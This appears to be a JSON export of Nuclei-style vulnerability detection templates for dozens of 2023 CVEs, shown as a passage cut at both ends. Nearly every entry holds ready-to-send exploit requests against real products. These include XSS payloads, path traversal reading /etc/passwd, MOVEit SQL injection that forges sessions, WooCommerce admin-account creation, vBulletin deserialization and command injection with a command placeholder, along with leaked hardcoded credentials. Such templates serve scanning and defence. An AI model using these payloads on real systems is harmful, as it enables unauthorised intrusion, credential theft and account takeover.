application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"apiVersion\":","\"uuid\":","\"userName\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28432","info":{"name":"MinIO Cluster Deployment - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /minio/bootstrap/v1/verify HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"MINIO_ROOT_PASSWORD\":","\"MINIO_ROOT_USER\":","\"MinioEnv\":"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28665","info":{"name":"Woo Bulk Price Update <2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<svg onload=alert(document.domain)>\")","contains(body_2, \"pagination\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-32235","info":{"name":"Ghost CMS < 5.42.1 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/built%2F..%2F..%2F/package.json","{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\"","\"version\"","\"ghost\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1177","info":{"name":"Mlflow <2.2.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-39141","info":{"name":"Aria2 WebUI - Path traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/../../../../etc/passwd"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Aria2 WebUI\")","regex(\"root:x:0:0:\",body_2)"],"condition":"and"}]}]},{"id":"CVE-2023-29084","info":{"name":"ManageEngine ADManager Plus - Command Injection","severity":"high"},"requests":[{"raw":["POST /j_security_check HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nis_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator\n","GET /home.do HTTP/1.1\nHost: {{Hostname}}\n","POST /api/json/admin/saveServerSettings HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nparams=[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"1.1.1.1\",\"USER_NAME\":\"random\",\"PASSWORD\":\"asd\\r\\n{{cmd}}\",\"PORT\":\"80\"}]&admpcsrf={{admpcsrf}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"message\":\"","Proxy Settings"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"kval","name":"admpcsrf","internal":true,"kval":["admpcsrf"],"part":"header"}]}]},{"id":"CVE-2023-1546","info":{"name":"MyCryptoCheckout < 2.124 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"scriptalert(/XSS/)/script\")","contains(body_2, \"mycryptocheckout\")"],"condition":"and"}]}]},{"id":"CVE-2023-27159","info":{"name":"Appwrite <=1.2.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Appwrite-Server"]}]}]},{"id":"CVE-2023-34598","info":{"name":"Gibbon v25.0.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=./gibbon.sql"],"matchers-condition":"and","matchers":[{"type":"word","words":["phpMyAdmin SQL Dump","gibbon"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28121","info":{"name":"WooCommerce Payments - Unauthorized Admin Access","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nX-WCPAY-PLATFORM-CHECKOUT-USER: 1\nContent-Type: application/x-www-form-urlencoded\n\nrest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered_date\":","\"username\":","\"email\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[201]}],"extractors":[{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-23752","info":{"name":"Joomla! Webservice - Password Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/index.php/v1/config/application?public=true","{{BaseURL}}/api/v1/config/application?public=true"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"links\":","\"attributes\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json","application/vnd.api+json"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35843","info":{"name":"NocoDB version <= 0.106.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30256","info":{"name":"Webkul QloApps 1.5.2 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["xss onfocus=alert(document.domain) autofocus= xss","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0448","info":{"name":"WP Helper Lite < 4.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><svg onload=alert(document.domain)>\")","contains(body, \"params\\\":{\\\"action\")"],"condition":"and"}]}]},{"id":"CVE-2023-26469","info":{"name":"Jorani 1.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /session/login HTTP/1.1\nHost: {{Hostname}}\n","POST /session/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword\n","GET /pages/view/log-{{date_time(\"%Y-%M-%D\")}} HTTP/1.1\nHost: {{Hostname}}\nX-REQUESTED-WITH: XMLHttpRequest\n{{header}}: {{base64(\"echo ---------;{{cmd}} 2>&1;echo ---------;\")}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=([\\d,]+)\\(.*?\\)"]},{"type":"status","part":"header_3","status":[401]}],"extractors":[{"type":"regex","part":"body","group":1,"internal":true,"name":"csrf","regex":["name=\"csrf_test_jorani\" value=\"(.*?)\""]}]}]},{"id":"CVE-2023-22620","info":{"name":"SecurePoint UTM 12.x Session ID Leak","severity":"high"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}\n","POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"{{session}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"status\":\"OK\""]},{"type":"word","part":"header_2","words":["application/json"]}],"extractors":[{"type":"regex","name":"session","group":1,"regex":["\"sessionid\": \"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2023-31548","info":{"name":"ChurchCRM v4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nFundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\\\" autofocus=\\\"\\\"></td>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-39600","info":{"name":"IceWarp 11.4.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25135","info":{"name":"vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/api/user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a\"googlelogin_vendor_autoload\"%3a0%3a{}i%3a1%3bO%3a32%3a\"Monolog\\Handler\\SyslogUdpHandler\"%3a1%3a{s%3a9%3a\"%00*%00socket\"%3bO%3a29%3a\"Monolog\\Handler\\BufferHandler\"%3a7%3a{s%3a10%3a\"%00*%00handler\"%3br%3a4%3bs%3a13%3a\"%00*%00bufferSize\"%3bi%3a-1%3bs%3a9%3a\"%00*%00buffer\"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a\"CVE-2023-25135\"%3bs%3a5%3a\"level\"%3bN%3b}}s%3a8%3a\"%00*%00level\"%3bN%3bs%3a14%3a\"%00*%00initialized\"%3bb%3a1%3bs%3a14%3a\"%00*%00bufferLimit\"%3bi%3a-1%3bs%3a13%3a\"%00*%00processors\"%3ba%3a2%3a{i%3a0%3bs%3a7%3a\"current\"%3bi%3a1%3bs%3a8%3a\"var_dump\"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["string(14)","\"CVE-2023-25135\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1698","info":{"name":"WAGO - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"package\":\";id;#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"license\":","\"name\":","uid=","gid="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23161","info":{"name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["center\"><img src=1 onerror=alert(document.domain)>","Art Type"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38433","info":{"name":"Fujitsu IP Series - Hardcoded Credentials","severity":"high"},"requests":[{"raw":["GET /b_download/index.html HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username + ':' + password)}}\n"],"attack":"pitchfork","payloads":{"username":["fedish264pro","fedish265pro"],"password":["h264pro@broadsight","h265pro@broadsight"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Field Support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37462","info":{"name":"XWiki Platform - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view","{{BaseURL}}/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"],"cookie-reuse":true,"skip-variables-check":true,"extractors":[{"type":"regex","group":1,"name":"id","regex":["data-xwiki-async-client-id=\"(.+?)\""],"internal":true},{"type":"regex","group":1,"name":"url","regex":["<span class=\"xwiki-async\" data-xwiki-async-id=\"(.+?)\""],"internal":true}],"matchers":[{"type":"dsl","dsl":["body_2 == \"31557644536232\"","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3345","info":{"name":"LMS by Masteriyo < 1.6.8 - Information Exposure","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/masteriyo/v1/users/ HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"username\":","\"email\":","\"roles\":"],"condition":"and"},{"type":"word","part":"header_3","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"versionString"],"internal":true}]}]},{"id":"CVE-2023-24733","info":{"name":"PMB 7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>@"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4634","info":{"name":"Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt","{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Media Library Assistant"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-37265","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Internal IP","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"X-Forwarded-For":"127.0.0.1"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-36934","info":{"name":"MOVEit Transfer - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntransaction=signon\n","POST /human.aspx?ep={{url_encode(ep)}} HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: InitialPage=zzzz.aspx;\n\ntransaction=passchangerequest\n","POST /machine.aspx HTTP/2\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};\n\na=a\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{session_cookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["\"refresh_token\"","\"access_token\"","\"token_type\"","\"expires_in\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ep","group":1,"regex":["\\bep=([^&]+)\""],"internal":true,"part":"body_1"},{"type":"regex","name":"session","group":1,"regex":["ASP.NET_SessionId=([^;]+)"],"internal":true,"part":"header_2"},{"type":"regex","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body_4"}]}]},{"id":"CVE-2023-0552","info":{"name":"WordPress Pie Register <3.8.2.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me"],"redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-37580","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=mobile\n","GET /m/momoveto?st=\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src=x onerror=alert(document.domain)>","id=\"zMoveForm\""],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35082","info":{"name":"MobileIron Core - Remote Unauthenticated API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/asfV3/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-0527","info":{"name":"Online Security Guards Hiring System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-request.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata=<img%20src=x%20onerror=alert(document.domain)>&search=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<img src=x onerror=alert(document.domain)>\")","contains(body, \"Online Security Gauard Hiring System |Search Request\")"],"condition":"and"}]}]},{"id":"CVE-2023-2272","info":{"name":"Tiempo.com <= 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Tiempo\")"],"condition":"and"}]}]},{"id":"CVE-2023-39143","info":{"name":"PaperCut < 22.1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"],"matchers":[{"type":"dsl","dsl":["content_length == 1655","status_code == 200","contains(to_lower(content_type), \"image/png\")","contains(hex_encode(body), \"89504e470d0a1a0a\")"],"condition":"and"}]}]},{"id":"CVE-2023-26843","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /NoteEditor.php?FamilyID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"><img src=x onerror=alert(document.domain)>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-0261","info":{"name":"WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"\\\"data\\\":{\")"],"condition":"and"}]}]},{"id":"CVE-2023-27179","info":{"name":"GDidees CMS v3.9.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["$filename=$_GET[\"filename\"];","@readfile($filename) OR die();"],"condition":"and"},{"type":"word","part":"header","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1496","info":{"name":"Imgproxy < 3.14.0 - Cross-site Scripting (XSS)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"],"matchers":[{"type":"dsl","dsl":["contains(body, 'PC9zdmc+#test')","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["content_security_policy"]}]}]},{"id":"CVE-2023-29623","info":{"name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","incorrect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34659","info":{"name":"JeecgBoot 3.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/show HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"id\":\"961455b47c0b86dc961e90b5893bff05\",\"apiUrl\":\"\",\"params\":\"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XPATH syntax error:","SQLException"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20864","info":{"name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /csrf HTTP/1.1\nHost: {{Hostname}}\nX-Csrf-Token: Fetch\n","POST /api/v2/internal/cluster/applyMembership HTTP/1.1\nHost: {{Hostname}}\nX-CSRF-Token: {{xcsrftoken}}\nContent-type: application/octet-stream\n\n{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"errorMessage\":\"Internal error"]}],"extractors":[{"type":"kval","name":"xcsrftoken","group":1,"internal":true,"kval":["X_CSRF_Token"]}]}]},{"id":"CVE-2023-29489","info":{"name":"cPanel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror=\"prompt(document.domain)\">aaaaaaaaaaaa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","Invalid webcall ID:"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-27524","info":{"name":"Apache Superset - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1/database/{{path}} HTTP/1.1\nHost: {{Hostname}}\nCookie: 